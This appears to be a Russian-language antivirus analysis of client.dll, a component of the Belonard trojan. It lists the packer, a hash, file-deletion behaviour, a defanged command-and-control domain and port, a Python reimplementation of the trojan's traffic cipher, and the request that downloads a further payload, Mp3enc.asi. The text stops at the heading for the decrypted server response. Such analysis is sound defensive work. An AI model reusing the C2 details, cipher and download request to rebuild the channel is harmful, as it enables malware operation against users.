Пакер: VMProtect
Дата компиляции: 25.10.2018 20:36:03
SHA1:
- 76a149cab53c6a438e3f6ec0e2b5b613bea1f6a7 (client.dll)
Описание
Является одним из компонентов троянца Belonard. Загружается на устройство за счет RCE-уязвимости.
Принцип действия
Библиотека удаляет любые .dat файлы, лежащие в одном каталоге с исполняемым файлом процесса, куда загружена библиотека. Затем подключается к управляющему серверу fuztxhus.valve-ms[.]ru:28445. Весь трафик, передаваемый между троянцем и управляющим сервером, шифруется.
Алгоритм шифрования/дешифровки:
import socket, random
def encbuf(data):
c = random.randint(11, 245)
d = random.randint(11, 245)
e = random.randint(11, 245)
f = random.randint(11, 245)
enc_r = ''
y = c
z = c
for i in range(len(data)):
y = (ord(data[i]) + f*z + e*y + d)&0xff
z = ord(data[i])
enc_r += chr(y & 0xff)
enc_r = '\x00\x00%c%c%c%c%s' % (f,e,d,c,enc_r)
return f,e,d,enc_r
def decbuf(f,e,d,enc):
y = ord(enc[0])
dec = ''
for i in range(1,len(enc)):
y = (ord(enc[i]) - e*ord(enc[i-1]) - f*y - d)&0xff
dec += chr(y)
return dec
Троянец отправляет запрос на скачивание файла Mp3enc.asi \x01GET /Mp3enc.asi HTTP/1.1\r\n\r\n.
Расшифрованный ответ сервера:
